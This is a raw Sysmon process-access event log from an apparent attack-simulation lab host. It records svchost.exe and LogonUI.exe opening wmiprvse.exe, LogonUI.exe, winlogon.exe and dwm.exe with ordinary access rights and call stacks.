13:58:15.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.805{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.805{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.805{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.805{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.805{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.805{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.758{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.696{59A5CD1D-93F7-6005-E904-00000000A301}44804904C:\Windows\system32\LogonUI.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\logoncontroller.dll+2eef5|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.696{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.696{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.633{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-EA04-00000000A301}1372C:\Windows\system32\dwm.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.618{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-EA04-00000000A301}1372C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.618{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-EA04-00000000A301}1372C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 